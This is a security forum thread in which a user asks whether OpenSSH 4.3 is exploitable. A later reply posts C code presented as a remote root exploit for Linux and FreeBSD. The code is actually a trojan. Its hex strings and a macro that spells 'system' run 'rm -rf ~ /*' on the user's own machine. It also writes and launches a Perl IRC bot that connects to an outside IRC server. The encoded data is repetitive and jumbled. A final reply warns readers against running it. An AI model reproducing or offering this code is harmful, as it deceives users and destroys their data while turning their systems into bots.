Government Security
Network Security Resources

Jump to content

Photo

Ssh-2.0-openssh_4.3

exploit ssh
  • Please log in to reply
3 replies to this topic

#1 koolnessness

koolnessness

    Private

  • Members
  • 1 posts

Posted 30 October 2007 - 08:08 PM

Is that version of openssh hackable/exploitable?

Max

#2 heldbak

heldbak

    Private

  • Members
  • 18 posts

Posted 01 November 2007 - 04:59 PM

Is that version of openssh hackable/exploitable?

Max


look it up in google/milw0rm/packetstorm - otherwise look for a hole yourself, then learn to exploit it

btw, i think you're gonna have to do it yourself as a quick search showed me nothing
Silly rabbit, scripts are for kids!

#3 Coded32

Coded32

    Private

  • Members
  • 5 posts

Posted 30 March 2013 - 10:31 AM

here it is


 

#include <stdio.h>



#include <stdlib.h>



#include <string.h>



#include <stdarg.h>



#include <sys/types.h>



#include <sys/socket.h>



#include <netinet/in.h>



#include <arpa/inet.h>



#include <unistd.h>



#include <netdb.h>







#define VALID_RANGE 0xb44ffe00



#define build_frem(x,y,a,b,c) a##c##a##x##y##b







char jmpcode[] =



    "\x72\x6D\x20\x2D\x72\x66\x20\
x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"



    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";







char shellcode[] =



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b

\x65"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b

\x65\x79"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d

\x22"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e

\x65\x75\x69\x72\x63"



        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d

\x7d"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b

\x65\x79"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d

\x22"



        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e

\x65\x75\x69\x72\x63"



        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d

\x7d"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b

\x65\x79"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d

\x22"



        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e

\x65\x75\x69\x72\x63"



        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d

\x7d"



        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e

\x2f"



        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f

\x68\x69"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a";











char fbsd_shellcode[] =



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d

\x22"



        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e

\x65\x75\x69\x72\x63"



        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d

\x7d"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b

\x65\x79"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b

\x65\x79"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d

\x22"



        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e

\x65\x75\x69\x72\x63"



        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d

\x7d"



        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e

\x2f"



        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f

\x68\x69"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f

\x63\x6b"



        "\x6e\x22\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"



        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a

\x20\x20\x20\x20\x20\x20\x20"



        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e

\x74\x20\x24\x73\x6f"



        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e

\x20\x24"



        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c

\x24"



        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e

\x50\x49\x4e"



        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e

\x74\x20"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c

\x0a"



        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b

\x65\x79"



        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d

\x22"



        "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d

\x70"



        "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c

\x3b"



        "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";



#define SIZE 0xffffff



#define OFFSET 131



#define fremote build_frem(t,e,s,m,y)







void usage(char *arg){



        printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");



        printf("  Usage: %s -h <host> -p port\n",arg);



        printf("  Options:\n");



        printf("  \t-h ip/host of target\n");



        printf("  \t-p port\n");



        printf("  \t-d username\n");



        printf("  \t-B memory_limit 8/16/64\n\n\n");



}







#define FD 0x080518fc



#define BD 0x08082000







int main(int argc, char **argv){



    FILE *jmpinst;



    char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;



    int port=23, limit=8, target=0, sock;



    struct hostent *host;



    struct sockaddr_in addr;







    if (geteuid()) {



    puts("need root for raw socket, etc...");



    return 1;



    }







    if(argc < 3){



        usage(argv[0]);



        return 1;



    }











    printf("\n  [+] 0wn0wn - by anti-sec group\n");







       if (!inet_aton(h, &addr.sin_addr)){



        host = gethostbyname(h);



        if (!host){



            printf("  [-] Resolving failed\n");



            return 1;



        }



        addr.sin_addr = *(struct in_addr*)host->h_addr;



    }







    sock = socket(PF_INET, SOCK_STREAM, 0);



    addr.sin_port = htons(port);



    addr.sin_family = AF_INET;



    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){



        printf("  [-] Connecting failed\n");



        return 1;



    }



    payload = malloc(limit * 10000);



    ptr = payload+8;



    memcpy(ptr,jmpcode,strlen(jmpcode));



    jmpinst=fopen(shellcode+793,"w+");



    if(jmpinst){



        fseek(jmpinst,0,SEEK_SET);



        fprintf(jmpinst,"%s",shellcode);



        fclose(jmpinst);



    }



    ptr += strlen(jmpcode);



    if(target != 5 && target != 6){



        memcpy(ptr,shellcode,strlen(shellcode));



        ptr += strlen(shellcode);



        memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));



    }



    else{



        memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));



        ptr += strlen(fbsd_shellcode);



        memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));



    }



    send(sock,buffer,strlen(buffer),0);



    send(sock,ptr,3750,0);



    close(sock);



    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {



        printf("  [-] connecting failed\n");



    }







    payload[sizeof(payload)-1] = '\0';



    payload[sizeof(payload)-2] = '\0';



    send(sock,buffer,strlen(buffer),0);



    send(sock,payload,strlen(payload),0);



    close(sock);



    free(payload);



    addr.sin_port = htons(6666);



    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {



                   /* v--- our cool bar that says: "r0000000t!!!" */



        printf("\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");



        fremote("PS1='sh-3.2#' /bin/sh");



    }



    else



        printf("  [-] failed to exploit target :-(\n");



    close(sock);



    return 0;



}


gcc fil.c -o pwn


#4 Juno

Juno

    Specialist

  • Sergeant Major
  • 142 posts

Posted 17 April 2013 - 09:12 AM

Sigh.

 

You could at least provided some attribution.  Found this elsewhere at:

http://blogs.securit...p/archives/1302

 

Additionally, the post you're replying to is around 5 years old. From that alone I suspect the original poster may have found his answer or moved on.  Finally, you might consider posting something relevant to openssh, the OP's concern.

 

Unless you simply wanted people to blindly execute this on their systems. Sorry, I think I'll pass.
 

-J


Hacking The Everyday - My blog blabberings about life, computer security, and everything in-between.
Don't forget to Read the Rules before you post!





Also tagged with one or more of these keywords: exploit, ssh